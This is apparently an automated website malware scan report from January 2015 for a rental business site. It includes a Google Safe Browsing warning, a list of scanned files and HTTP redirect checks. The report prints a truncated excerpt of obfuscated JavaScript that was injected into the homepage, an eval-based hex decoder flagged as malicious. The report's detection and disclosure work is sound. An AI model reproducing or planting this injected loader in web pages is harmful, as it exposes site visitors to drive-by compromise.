Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=geisertrentals.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://geisertrentals.com/ | 200 OK Content-Length: 20553 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) hvqb="y";kszxo="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kszxo].getElementById("asd"))}()}catch(pigj){yvwh=function(kcnrwi){kcnrwi="fro"+kcnrwi;for(civf=0;civf<hvqb.length;civf++){nahlna+=String[kcnrwi](uqc(ggtc+(hvqb[civf]))-(70));}};};uqc=(window.eval);ggtc="0x";iar=0;try{;}catch(owtpak){iar=1}if(!iar){try{++uqc(kszxo)["\x62o"+"d"+hvqb]}catch(pigj){xhxmft="^";}hvqb="66^ac^bb^b4^a9^ba^af^b5^b4^66^af^b7^a7^be^76^7f^6e^6f^66^c1^53^50^66^bc^a7^b8^66^b9^ba^a7^ba^ Antivirus reports:
| ||
http://geisertrentals.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 12 Jan 2015 16:52:26 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10599 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://geisertrentals.com/js/selectBox/jquery.selectBox.min.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 12 Jan 2015 16:52:29 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://geisertrentals.com/js/jquery.watermark.min.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 12 Jan 2015 16:52:30 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://geisertrentals.com/js/fancybox/jquery.fancybox.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 12 Jan 2015 16:52:30 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://geisertrentals.com/js/fancybox/helpers/jquery.fancybox-media.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 12 Jan 2015 16:52:31 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: geisertrentals.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 16:52:25 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 20553
Content-Type: text/html
Last-Modified: Mon, 30 Sep 2013 21:43:08 GMT
...20553 bytes of data.
GET / HTTP/1.1
Host: geisertrentals.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 16:52:25 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 20553
Content-Type: text/html
Last-Modified: Mon, 30 Sep 2013 21:43:08 GMT
...20553 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: geisertrentals.com
Referer: http://www.google.com/search?q=geisertrentals.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: geisertrentals.com
Referer: http://www.google.com/search?q=geisertrentals.com
Result:
The result is similar to the first query. There are no suspicious redirects found.